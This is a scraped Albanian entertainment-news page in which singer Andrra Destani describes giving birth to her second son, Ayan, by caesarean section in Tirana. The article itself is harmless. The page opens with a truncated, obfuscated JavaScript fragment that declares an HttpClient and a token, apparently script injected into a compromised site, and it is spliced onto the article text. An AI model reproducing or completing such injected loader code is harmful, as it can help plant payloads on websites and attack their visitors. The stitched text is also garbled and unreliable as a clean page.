;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

“E përjetova shumë keq…”, Andrra Destani flet për lindjen e fëmijës së dytë

By

Në mars të këtij viti, Sinan Hoxha dhe Andrra Destani u bekuan me fëmijën e dytë. Në jetë erdhi një djalë që i lanë emrin Ayan.

Fëmija i parë i çiftit, Andi katër vjeçar u bë një vëlla i madh.

View this post on Instagram

A post shared by 𝒜 𝓃 𝒹 𝓇𝓇 𝒶 (@andrradestani)

Të gjithë shtatzëninë, Andrra e kishte mbajtur larg vëmendjes së publikut, dhe vetëm tani ajo ka nisur të zbulojë detaje nga rrugëtimi i saj.

Ajo zbuloi se shumicën e shtatzënisë së saj ajo e ka kaluar në regjim shtrati dhe se ndryshe nga Ansi që u lind në Gjermani, Ayan lindi në Tiranë.

Duke iu përgjigjur pyetjes së një ndjekësi, Andrra tha se lindja e dytë është bërë me operacion cezarian.

“E përjetova shumë keq… por për një javë e mora veten”, shkroi ajo kur një ndjekës e pyeti se si e kaloi si eksperiencë.

Ajo gjithashtu zbuloi se ishte e detyruar t’i nënshtrohej operacionit që të sillte në jetë vogëlushin e saj shëndosh e mirë.

“Për fat të keq me operacion pasi që ishte 3 herë i lidhur me kordon rreth qafës”, shkroi ajo në një tjetër postim. /Prive.al

Artikuj të ngjashëm